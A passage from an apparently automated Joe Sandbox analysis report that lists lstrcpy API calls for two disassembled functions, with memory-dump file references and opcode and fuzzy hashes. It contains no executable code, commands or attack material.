                                  • lstrcpy.KERNEL32(00000000,?), ref: 003215D9
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00321611
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00321649
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: f3e5180b8e92e0e65294c53d847ccc19a6227d882eec64d3c1ca699010714c55
                                  • Instruction ID: 1fb39e0301b2df75bdfcc4e28b91b9db00913d70dbfc0ce3b28b685d070f78d7
                                  • Opcode Fuzzy Hash: f3e5180b8e92e0e65294c53d847ccc19a6227d882eec64d3c1ca699010714c55
                                  • Instruction Fuzzy Hash: 6E2119B4601B028FD736DF6AE5A8A17B7F4AF55700B15491CA886C7B80DB30F855CB90
                                  Function 00301610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 0030162D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030164F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301671
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301693
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 7cecc098c889b7637f61f913aee70f1125c4048726d4c447a821df99a9e437f4
                                  • Instruction ID: a13460cf985236e5145384efc02fa3ed0300f60e874426fe9b6cb0eb1455203b
                                  • Opcode Fuzzy Hash: 7cecc098c889b7637f61f913aee70f1125c4048726d4c447a821df99a9e437f4
                                  • Instruction Fuzzy Hash: 971130B4A12B079BDB259F75D86C927B7F8FF44301709052DA896C7B80EB31E811CB94